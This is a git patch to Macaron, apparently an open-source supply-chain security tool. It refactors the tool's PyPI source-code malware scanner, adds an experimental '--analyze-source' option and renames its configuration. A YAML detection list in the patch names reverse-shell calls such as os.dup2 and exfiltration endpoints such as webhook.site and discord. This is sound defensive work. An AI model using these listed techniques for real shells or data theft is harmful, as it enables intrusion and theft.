From dffd91160eff1aa354d6bc446b8383b0da15814a Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Fri, 17 Jan 2025 15:18:25 +1000 Subject: [PATCH 01/37] refactor: refactoring existing source code analysis functionality chore: Merging staging changes with sourcecode analysis. --- src/macaron/__main__.py | 9 +- src/macaron/config/defaults.ini | 4 + .../pypi_heuristics/heuristics.py | 3 + .../pypi_sourcecode_analyzer.py | 444 ++++++++++++------ .../suspicious_patterns.yaml} | 6 +- src/macaron/slsa_analyzer/analyze_context.py | 6 +- src/macaron/slsa_analyzer/analyzer.py | 16 +- .../checks/detect_malicious_metadata_check.py | 58 ++- .../package_registry/pypi_registry.py | 122 ++--- src/macaron/util.py | 8 +- 10 files changed, 414 insertions(+), 262 deletions(-) rename src/macaron/malware_analyzer/pypi_heuristics/{ => sourcecode}/pypi_sourcecode_analyzer.py (58%) rename src/macaron/malware_analyzer/pypi_heuristics/{suspicious_pattern.yaml => sourcecode/suspicious_patterns.yaml} (95%) diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 03549db7f..2833b32af 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -172,8 +172,8 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None analyzer_single_args.sbom_path, deps_depth, provenance_payload=prov_payload, - validate_malware=analyzer_single_args.validate_malware, verify_provenance=analyzer_single_args.verify_provenance, + analyze_source=analyzer_single_args.analyze_source, ) sys.exit(status_code) @@ -477,10 +477,13 @@ def main(argv: list[str] | None = None) -> None: ) single_analyze_parser.add_argument( - "--validate-malware", + "--analyze-source", required=False, action="store_true", - help=("Enable malware validation."), + help=( + "EXPERIMENTAL. For improved malware detection, analyze the source code of the" + + " (PyPI) package using a textual scan and dataflow analysis." + ), ) single_analyze_parser.add_argument( diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index c46e09ce1..99be0b7bd 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,3 +600,7 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 + +# yaml configuration file containing suspicious patterns. Can be full path or relative to +# folder where macaron is installed +suspicious_patterns_file = src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index bd829a0f1..8447a9961 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,6 +37,9 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" + #: Indicates that the package source code contains suspicious code patterns. + SUSPICIOUS_PATTERNS = "suspicious_patterns" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py similarity index 58% rename from src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py rename to src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index edf7a1830..a616c8e57 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """ @@ -13,184 +13,253 @@ import ipaddress import logging import os -import pathlib import re +from dataclasses import dataclass import yaml +from macaron.config.defaults import defaults +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset logger: logging.Logger = logging.getLogger(__name__) +IMPORTS = "imports" +CONSTANTS = "constants" +CALLS = "calls" -class DataFlowTracer(ast.NodeVisitor): - """The class is used to create the symbol table and analyze the dataflow.""" - def __init__(self) -> None: - self.symbol_table: dict = {} # Store variable assignments - self.trace_path: list = [] +@dataclass(frozen=True) +class Import: + """Data class to hold information about extracted import statements. - def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 - """Visit the Assign node and build the symbol table.""" - for target in node.targets: - if isinstance(target, ast.Name): - target_name = target.id - if isinstance(node.value, ast.Name): - self.symbol_table[target_name] = str(node.value.id) - elif isinstance(node.value, ast.Constant): - self.symbol_table[target_name] = str(node.value.value) - # Handle other assignment types as needed (e.g., function calls, lists) - else: - self.symbol_table[target_name] = ast.unparse(node.value) - self.generic_visit(node) # Important for visiting nested assign + Name, alias, and module are referring to the following patterns of python import statements: + - [from ] import [as ] + """ - def trace_back(self, variable_name: str) -> list: - """Get the full path of the dataflow. + name: str + alias: str | None + module: str | None + lineno: int + statement: str - Parameters - ---------- - variable_name: str - The argument of the function call. + +class PyPISourcecodeAnalyzer: + """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. + + This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files + in the source code, looking for suspicious patterns defined by the YAML file in defaults.ini. By default, this + will include suspicious package imports, suspicious hardcoded constants, and suspicious function calls. If this + scan does not find any suspicious activity, the analysis will stop and the package will be marked as benign + by this analyzer. If the scan does find suspicious activity, the analyzer will move on to the second phase. + + In the second phase, the analyzer will perform dataflow analysis. This will track the flow of suspicious constants + and the results of suspicious function calls to where they are used, to determine if they are used in a malicious + manner. Suspicious activity includes data exfiltration, code execution, remote connections, operating system and + process manipulation, and encoded and obfuscated patterns. The types of activity, and their severity and quantity, + will then determine the probability of the package being malicious. + + Currently, this analyzer only supports the first phase, and will return simply boolean results on the maliciousness + of the package. + """ + + EXPECTED_PATTERN_CATEGORIES = [IMPORTS, CONSTANTS, CALLS] + + def __init__(self) -> None: + """Collect required data for analysing the source code.""" + self.suspicious_patterns = self._load_defaults() + + def _load_defaults(self) -> dict[str, dict[str, list]]: + """Load the suspicious pattern from suspicious_pattern.yaml. Returns ------- - list - The path of the dataflow. - """ - self.trace_path = [] - self._recursive_trace(variable_name) - return self.trace_path - - def _recursive_trace(self, variable_name: str) -> None: - """Recursively build the dataflow path by analyzing the symbol table. + dict[str: dict[str, list]] + The suspicious pattern. - Parameters - ---------- - variable_name: str - The argument of the function call. + Raises + ------ + ConfigurationError + if the suspicious pattern file is not in the expected format or cannot be accessed. """ - if variable_name in self.symbol_table: - value = self.symbol_table[variable_name] - if not self.trace_path: - self.trace_path.extend([variable_name, value]) + suspicious_patterns: dict[str, dict[str, list]] = {} + section_name = "heuristic.pypi" + + if defaults.has_section(section_name): + section = defaults[section_name] + else: + error_msg = f"Unable to find section {section_name}, which is required to load suspicious patterns." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + configuration_name = "suspicious_patterns_file" + filename = section.get(configuration_name) + if filename is None: + error_msg = f"Unable to find {configuration_name} in configuration file." + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + filename = os.path.normpath(filename) + try: + with open(filename, encoding="utf-8") as file: + configured_patterns: dict[str, JsonType] = yaml.safe_load(file) + except FileNotFoundError as file_error: + error_msg = f"Unable to open locate {filename}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) from file_error + except yaml.YAMLError as yaml_error: + error_msg = f"Unable to parse {filename} as a yaml file." + logger.debug(error_msg) + raise ConfigurationError(error_msg) from yaml_error + + for expected_category in self.EXPECTED_PATTERN_CATEGORIES: + if expected_category not in configured_patterns: + error_msg = ( + f"Expected suspicious pattern category {expected_category} present in" + + f" {filename}: must have categories {self.EXPECTED_PATTERN_CATEGORIES}" + ) + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + for category, patterns in configured_patterns.items(): + suspicious_patterns[category] = {} + if isinstance(patterns, list): + suspicious_patterns[category][category] = patterns + elif isinstance(patterns, dict): + for subcategory, subpatterns in patterns.items(): + if not isinstance(subpatterns, list): + error_msg = f"Expected subcategory {subcategory} items to be" + f" a list in {filename}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + suspicious_patterns[category][subcategory] = subpatterns else: - self.trace_path.append(value) - if ( - isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value - ): # only trace if it is a var name - self._recursive_trace(value) + error_msg = f"Expected category {category} to be either a list" + f" or dictionary in {filename}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) - def generate_symbol_table(self, source_code: str) -> None: - """Generate the symbol table. + return suspicious_patterns + + def analyze_patterns(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious patterns. + + This is the first phase of the source code analyzer. Parameters ---------- - source_code: str - The source code of the script. + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. """ - tree = ast.parse(source_code) - self.visit(tree) + analysis_result: dict = {} + result: HeuristicResult = HeuristicResult.PASS + source_code = pypi_package_json.package_sourcecode + if not source_code: + error_msg = "Unable to retrieve PyPI package source code" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) -class PyPISourcecodeAnalyzer: - """This class is used to analyze the source code.""" + for filename, content in source_code.items(): + detail_info = {} - def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None: - """Collect required data for analysing the source code.""" - self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode() - self.suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern() - # self.extracted_suspicious_content: dict[str, JsonType] = {} - self.analysis_result: dict = {} - self.is_malware: bool = False + try: + _ = ast.parse(content) + except (SyntaxError, ValueError) as ast_parse_error: + logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) + continue - def analyze(self) -> tuple[bool, dict]: - """Analyze the source code of the PyPI package. + imports = self._extract_imports(content) + import_names = set() + for i in imports: + if i.module: + import_names.add(".".join([i.module, i.name])) + import_names.add(i.name) - Returns - ------- - dict - The result of the analysis. - """ - if self.source_code and self.suspicious_pattern: - for filename, content in self.source_code.items(): - try: - imports = self._extract_imports_from_ast(content) - except SyntaxError: - imports = self._extract_imports_from_lines(content) - - if isinstance(self.suspicious_pattern["imports"], list): - suspicious_imports: set[str] | None = imports & set(self.suspicious_pattern["imports"]) - else: - suspicious_imports = None - - # No suspicious imports in the source code. Skip the further steps. - if not suspicious_imports: - logger.debug("No suspicious imports found in the file %s", filename) - continue - - # TODO: Currently the symbol table stores the data for dataflow analysis. - # In the future, the dataflow will be more complicated and even handle the cross-file dataflow. - tracer = DataFlowTracer() - tracer.generate_symbol_table(content) - logger.debug(tracer.symbol_table) - - # TODO: In the future, the probability policy to decide the file is malicious or not - # will be implemented. Therefore, the functioncall_analyzer.analyze() will return detail_info - # and analysis result. - functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) - is_malware, detail_info = functioncall_analyzer.analyze(content) - if is_malware: - self.is_malware = is_malware - - # TODO: Currently, the result collector does not handle the situation that - # multiple same filename. In the future, this will be replace with absolute path. - if detail_info: - self.analysis_result[filename] = detail_info - - # TODO: Implement other suspicious setup in suspicious_pattern.yaml - # pattern = r"install_requires\s*=\s*\[(.*?)\]" - # matches: re.Match | None = re.search(pattern, content, re.DOTALL) - # if matches: - # install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1))) - # if ( - # install_requires - # and install_requires & set(self.suspicious_pattern["imports"]) - # and len(install_requires) < 4 - # # This threshold is based on historical malwares - # ): - # extracted_data["install_requires"] = install_requires - # TODO: In the future this result from each file will be used to calculate the probability. - # Then the is_malicious will be based on this value. - # Currently, the default policy is - return self.is_malware, self.analysis_result - - # def extract_susupicious_content(self) -> None: - # """Extract the suspicious content from the source code.""" - # if not self.source_code or not self.suspicious_pattern: - # return - # self.extracted_suspicious_content = self._extract_suspicious_content_from_source() - - def _load_suspicious_pattern(self) -> dict[str, JsonType] | None: - """Load the suspicious pattern from suspicious_pattern.yaml. + for category, patterns in self.suspicious_patterns[IMPORTS].items(): + category_info = [] + + suspicious_imports = set.intersection(import_names, set(patterns)) + if suspicious_imports: + category_info = [i for i in imports if i.name in suspicious_imports] + result = HeuristicResult.FAIL + + detail_info[category] = category_info + + analysis_result[filename] = {IMPORTS: detail_info} + + return result, analysis_result + + def analyze_dataflow(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious dataflow. + + This is the second phase of the source code analyzer. Currently, this function is a placeholder for future + work. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. Returns ------- - dict[str, JsonType] | None - The suspicious pattern. + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant dataflows identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. """ - filename: str = "suspicious_pattern.yaml" - curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute() - suspicious_pattern_file: str = os.path.join(curr_dir, filename) - with open(suspicious_pattern_file, encoding="utf-8") as file: + analysis_result: dict = {} + result: HeuristicResult = HeuristicResult.SKIP + + source_code = pypi_package_json.package_sourcecode + if not source_code: + error_msg = "Unable to retrieve PyPI package source code" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + for filename, content in source_code.items(): try: - suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file) - except yaml.YAMLError as yaml_exception: - logger.debug("Error parsing the yaml file: '%s'", yaml_exception) - return None - return suspicious_pattern + _ = ast.parse(content) + except (SyntaxError, ValueError) as ast_parse_error: + logger.debug("File %s cannot be parsed as a python file: %s", filename, ast_parse_error) + continue - def _extract_imports_from_ast(self, content: str) -> set[str]: + # tracer = DataFlowTracer() + # tracer.generate_symbol_table(content) + + # functioncall_analyzer = FunctionCallAnalyzer(self.suspicious_pattern, tracer) + # is_malware, detail_info = functioncall_analyzer.analyze(content) + # if is_malware: + # result = HeuristicResult.FAIL + + # # TODO: Currently, the result collector does not handle the situation that + # # multiple same filename. In the future, this will be replace with absolute path. + # if detail_info: + # analysis_result[filename] = detail_info + + return result, analysis_result + + def _extract_imports(self, content: str) -> set[Import]: + try: + return self._extract_imports_from_ast(content) + except SyntaxError: + return self._extract_imports_from_lines(content) + + def _extract_imports_from_ast(self, content: str) -> set[Import]: """Extract imports from source code using the parsed AST. Parameters @@ -213,18 +282,16 @@ def _extract_imports_from_ast(self, content: str) -> set[str]: for node in ast.walk(tree): if isinstance(node, ast.Import): for alias in node.names: - imports.add(alias.name) + imports.add(Import(alias.name, alias.asname, None, alias.lineno, "")) elif isinstance(node, ast.ImportFrom): module = node.module if module: _module = "." * node.level + module - imports.add(_module) for name in node.names: - imports.add(_module + "." + name.name) - + imports.add(Import(name.name, name.asname, _module, name.lineno, "")) return imports - def _extract_imports_from_lines(self, content: str) -> set[str]: + def _extract_imports_from_lines(self, content: str) -> set[Import]: """Extract imports from source code using per line pattern matching. Parameters @@ -275,7 +342,7 @@ def _extract_imports_from_lines(self, content: str) -> set[str]: # 3 - from import statement module components. imports = set() - for line in content.splitlines(): + for lineno, line in enumerate(content.splitlines()): line.strip() match = re.match(combined_pattern, line) if not match: @@ -285,15 +352,13 @@ def _extract_imports_from_lines(self, content: str) -> set[str]: # Standard import, handle commas and aliases if present. splits = self._prune_aliased_lines(match.group(1), alias_pattern) for split in splits: - imports.add(split) + imports.add(Import(split, None, None, lineno, "")) elif match.group(2): # From import - imports.add(match.group(2)) if match.group(3): splits = self._prune_aliased_lines(match.group(3), alias_pattern) for split in splits: - imports.add(match.group(2) + "." + split) - + imports.add(Import(split, None, match.group(2), lineno, "")) return imports def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: @@ -306,6 +371,75 @@ def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]: return results +class DataFlowTracer(ast.NodeVisitor): + """The class is used to create the symbol table and analyze the dataflow.""" + + def __init__(self) -> None: + self.symbol_table: dict = {} # Store variable assignments + self.trace_path: list = [] + + def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103 + """Visit the Assign node and build the symbol table.""" + for target in node.targets: + if isinstance(target, ast.Name): + target_name = target.id + if isinstance(node.value, ast.Name): + self.symbol_table[target_name] = str(node.value.id) + elif isinstance(node.value, ast.Constant): + self.symbol_table[target_name] = str(node.value.value) + # Handle other assignment types as needed (e.g., function calls, lists) + else: + self.symbol_table[target_name] = ast.unparse(node.value) + self.generic_visit(node) # Important for visiting nested assign + + def trace_back(self, variable_name: str) -> list: + """Get the full path of the dataflow. + + Parameters + ---------- + variable_name: str + The argument of the function call. + + Returns + ------- + list + The path of the dataflow. + """ + self.trace_path = [] + self._recursive_trace(variable_name) + return self.trace_path + + def _recursive_trace(self, variable_name: str) -> None: + """Recursively build the dataflow path by analyzing the symbol table. + + Parameters + ---------- + variable_name: str + The argument of the function call. + """ + if variable_name in self.symbol_table: + value = self.symbol_table[variable_name] + if not self.trace_path: + self.trace_path.extend([variable_name, value]) + else: + self.trace_path.append(value) + if ( + isinstance(value, str) and value in self.symbol_table and self.symbol_table[value] != value + ): # only trace if it is a var name + self._recursive_trace(value) + + def generate_symbol_table(self, source_code: str) -> None: + """Generate the symbol table. + + Parameters + ---------- + source_code: str + The source code of the script. + """ + tree = ast.parse(source_code) + self.visit(tree) + + class FunctionCallAnalyzer(ast.NodeVisitor): """This class analyzes Python source code to identify potential suspicious behavior.""" @@ -348,8 +482,8 @@ def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disabl def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103 """Visit the Call node.""" - suspicious_calls: dict = self.suspicious_patterns["ast_calls"] - suspicious_const: dict = self.suspicious_patterns["ast_constant"] + suspicious_calls: dict = self.suspicious_patterns[CALLS] + suspicious_const: dict = self.suspicious_patterns[CONSTANTS] function_call: str = ast.unparse(node.func) args: str = " ".join([ast.unparse(arg) for arg in node.args]) expr: str = ast.unparse(node) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml similarity index 95% rename from src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml rename to src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml index 9c15144d4..3838e23a7 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. @@ -20,7 +20,7 @@ imports: - subprocess - Request -ast_calls: +calls: os_detection: - os.name code_execution: @@ -59,7 +59,7 @@ ast_calls: reverse_shell: - os.dup2 -ast_constant: +constants: domains: - webhook.site - discord diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 84d8151f2..0f0804dc1 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -51,8 +51,8 @@ class ChecksOutputs(TypedDict): """The provenance and related information.""" local_artifact_paths: list[str] """The local artifact absolute paths.""" - validate_malware: bool - """True when the malware validation is enabled.""" + analyze_source: bool + """True when PyPI source code analysis has been enabled.""" class AnalyzeContext: @@ -106,7 +106,7 @@ def __init__( expectation=None, provenance_info=None, local_artifact_paths=[], - validate_malware=False, + analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index e3957e875..ed5dfe039 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -136,8 +136,8 @@ def run( sbom_path: str = "", deps_depth: int = 0, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -154,10 +154,10 @@ def run( The depth of dependency resolution. Default: 0. provenance_payload : InToToPayload | None The provenance intoto payload for the main software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -190,8 +190,8 @@ def run( main_config, analysis, provenance_payload=provenance_payload, - validate_malware=validate_malware, verify_provenance=verify_provenance, + analyze_source=analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -309,8 +309,8 @@ def run_single( analysis: Analysis, existing_records: dict[str, Record] | None = None, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -327,10 +327,10 @@ def run_single( The mapping of existing records that the analysis has run successfully. provenance_payload : InToToPayload | None The provenance intoto payload for the analyzed software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -541,7 +541,7 @@ def run_single( # TODO Add release tag, release digest. ) - analyze_ctx.dynamic_data["validate_malware"] = validate_malware + analyze_ctx.dynamic_data["analyze_source"] = analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index c69de3bde..9e1e8dd42 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -25,7 +25,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.source_code_repo import SourceCodeRepoAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer -from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck @@ -100,26 +100,26 @@ def _should_skip( return True return False - def validate_malware(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: - """Validate the package is malicious. + def analyze_source(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. Returns ------- - tuple[bool, dict[str, JsonType] | None] - Returns True if the source code includes suspicious pattern. - Returns the result of the validation including the line number - and the suspicious arguments. - e.g. requests.get("http://malicious.com") - return the "http://malicious.com" + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. """ - # TODO: This redundant function might be removed - sourcecode_analyzer = PyPISourcecodeAnalyzer(pypi_package_json) - is_malware, detail_info = sourcecode_analyzer.analyze() - return is_malware, detail_info + logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) + try: + sourcecode_analyzer = PyPISourcecodeAnalyzer() + return sourcecode_analyzer.analyze_patterns(pypi_package_json) + except (ConfigurationError, HeuristicAnalyzerValueError) as source_code_error: + logger.debug("Unable to perform source code analysis: %s", source_code_error) + return HeuristicResult.SKIP, {} def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] @@ -279,6 +279,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, + package_sourcecode={} ) pypi_registry_info.metadata.append(pypi_package_json) @@ -286,28 +287,33 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Download the PyPI package JSON, but no need to persist it to the filesystem. if pypi_package_json.package_json or pypi_package_json.download(dest=""): try: - result, detail_info = self.run_heuristics(pypi_package_json) + heuristic_results, heuristics_detail_info = self.run_heuristics(pypi_package_json) except HeuristicAnalyzerValueError: return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) - confidence, triggered_rules = self.evaluate_heuristic_results(result) - detail_info["triggered_rules"] = triggered_rules + confidence, triggered_rules = self.evaluate_heuristic_results(heuristic_results) + heuristics_detail_info["triggered_rules"] = triggered_rules result_type = CheckResultType.FAILED if not confidence: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - elif ctx.dynamic_data["validate_malware"]: - is_malware, validation_result = self.validate_malware(pypi_package_json) - if is_malware: # Find source code block matched the malicious pattern - confidence = Confidence.HIGH - elif validation_result: # Find suspicious source code, but cannot be confirmed - confidence = Confidence.MEDIUM - logger.debug(validation_result) + + # experimental analyze sourcecode feature + if ctx.dynamic_data["analyze_source"] and pypi_package_json.download_sourcecode(): + sourcecode_result, sourcecode_detail_info = self.analyze_source(pypi_package_json) + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result + heuristics_detail_info.update(sourcecode_detail_info) + + if sourcecode_result == HeuristicResult.FAIL: + if result_type == CheckResultType.PASSED: + # heuristics determined it benign, so lower the confidence + confidence = Confidence.LOW + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( - result=result, - detail_information=detail_info, + result=heuristic_results, + detail_information=heuristics_detail_info, confidence=confidence, ) ) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index b0b0275b5..04db1d2e2 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -159,77 +159,73 @@ def download_package_json(self, url: str) -> dict: return res_obj - def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: - """Get the source code of the package. + def download_package_sourcecode(self, url: str) -> dict: + """Download the package source code from pypi registry. + + Parameters + ---------- + url: str + The package source code url. Returns ------- - str | None - The source code. + dict[str: bytes] + A dictionary of filenames and file contents. """ + sourcecode: dict = {} + # Get name of file. - _, _, file_name = src_url.rpartition("/") + _, _, file_name = url.rpartition("/") - # Create a temporary directory to store the downloaded source. + # temporary directory to unzip and read all source files with tempfile.TemporaryDirectory() as temp_dir: - try: - response = requests.get(src_url, stream=True, timeout=40) - response.raise_for_status() - except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) - return None - - if response.status_code != 200: - return None + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) source_file = os.path.join(temp_dir, file_name) with open(source_file, "wb") as file: try: for chunk in response.iter_content(): file.write(chunk) - except RequestException as error: - # Something went wrong with the request, abort. - logger.debug("Error while streaming source file: %s", error) - response.close() - return None - logger.debug("Begin fetching the source code from PyPI") - py_files_content: dict[str, str] = {} + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) + raise InvalidHTTPResponseError from RequestException + if tarfile.is_tarfile(source_file): try: - with tarfile.open(source_file, "r:gz") as tar: - for member in tar.getmembers(): - if member.isfile() and member.name.endswith(".py") and member.size > 0: - file_obj = tar.extractfile(member) - if file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[member.name] = content - except tarfile.ReadError as exception: - logger.debug("Error reading tar file: %s", exception) - return None + with tarfile.open(source_file, "r:gz") as sourcecode_tar: + for member in sourcecode_tar.getmembers(): + if member.isfile() and (file_obj := sourcecode_tar.extractfile(member)): + sourcecode[member.name] = file_obj.read() + + except tarfile.ReadError as read_error: + error_msg = f"Error reading source code tar file: {read_error}" + logger.debug(error_msg) + raise InvalidHTTPResponseError(error_msg) from read_error + elif zipfile.is_zipfile(source_file): try: - with zipfile.ZipFile(source_file, "r") as zip_ref: - for info in zip_ref.infolist(): - if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: - with zip_ref.open(info) as file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[info.filename] = content - except zipfile.BadZipFile as bad_zip_exception: - logger.debug("Error reading zip file: %s", bad_zip_exception) - return None - except zipfile.LargeZipFile as large_zip_exception: - logger.debug("Zip file too large to read: %s", large_zip_exception) - return None - # except KeyError as zip_key_exception: - # logger.debug( - # "Error finding target '%s' in zip file '%s': %s", archive_target, source_file, zip_key_exception - # ) 